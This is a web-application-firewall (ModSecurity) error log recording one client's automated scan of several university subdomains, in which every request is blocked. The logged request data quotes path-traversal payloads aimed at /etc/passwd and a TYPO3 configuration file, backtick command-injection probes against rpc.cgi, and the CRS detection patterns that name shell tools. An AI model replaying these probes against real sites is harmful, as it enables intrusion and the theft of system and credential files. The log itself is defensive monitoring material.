[Tue Aug 29 11:43:18.408378 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAARpg6UAAAAU"]
[Tue Aug 29 11:43:18.433647 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAexIAoAAAAN"]
[Tue Aug 29 11:43:18.436108 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAdb7o0AAAAb"]
[Tue Aug 29 11:43:18.438355 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAdTBFgAAAAY"]
[Tue Aug 29 11:43:18.438693 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAbo-hkAAAAi"]
[Tue Aug 29 11:43:18.439166 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAARpg6YAAAAU"]
[Tue Aug 29 11:43:18.457329 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAdECfIAAAAW"]
[Tue Aug 29 11:43:18.457752 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAeX1G4AAAAK"]
[Tue Aug 29 11:43:19.376489 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13Z8Co-f0AAAexIA0AAAAN"]
[Tue Aug 29 11:43:19.384026 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13Z8Co-f0AAAdQ3moAAAAV"]
[Tue Aug 29 11:43:20.359004 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAdQ3mwAAAAV"]
[Tue Aug 29 11:43:20.391021 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAcsLLEAAAAE"]
[Tue Aug 29 11:43:20.402878 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAdxUWIAAAAC"]
[Tue Aug 29 11:43:20.436633 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAdxUWMAAAAC"]
[Tue Aug 29 11:43:20.476019 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAbo-h8AAAAi"]
[Tue Aug 29 11:43:21.419690 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAbo-iIAAAAi"]
[Tue Aug 29 11:43:21.429665 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13acCo-f0AAAdftYcAAAAG"]
[Tue Aug 29 11:43:21.443306 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAbo-iMAAAAi"]
[Tue Aug 29 11:43:21.456054 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdQ3nMAAAAV"]
[Tue Aug 29 11:43:21.459550 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAXNua4AAAAg"]
[Tue Aug 29 11:43:21.460880 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdECfsAAAAW"]
[Tue Aug 29 11:43:21.507229 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAXNua8AAAAg"]
[Tue Aug 29 11:43:21.507725 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAdeQ3kAAAAQ"]
[Tue Aug 29 11:43:21.508476 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAe1eeQAAAAB"]
[Tue Aug 29 11:43:21.535217 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAdeQ3oAAAAQ"]
[Tue Aug 29 11:43:22.463692 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13asCo-f0AAAXNubEAAAAg"]
[Tue Aug 29 11:43:22.649623 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13asCo-f0AAAdECgQAAAAW"]
[Tue Aug 29 11:43:22.672708 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13asCo-f0AAAdECgUAAAAW"]
[Tue Aug 29 11:43:23.380592 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAc@cccAAAAL"]
[Tue Aug 29 11:43:23.382578 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAeAW8AAAAAu"]
[Tue Aug 29 11:43:23.429582 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13a8Co-f0AAAcvBn8AAAAJ"]
[Tue Aug 29 11:43:23.445424 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAexIBsAAAAN"]
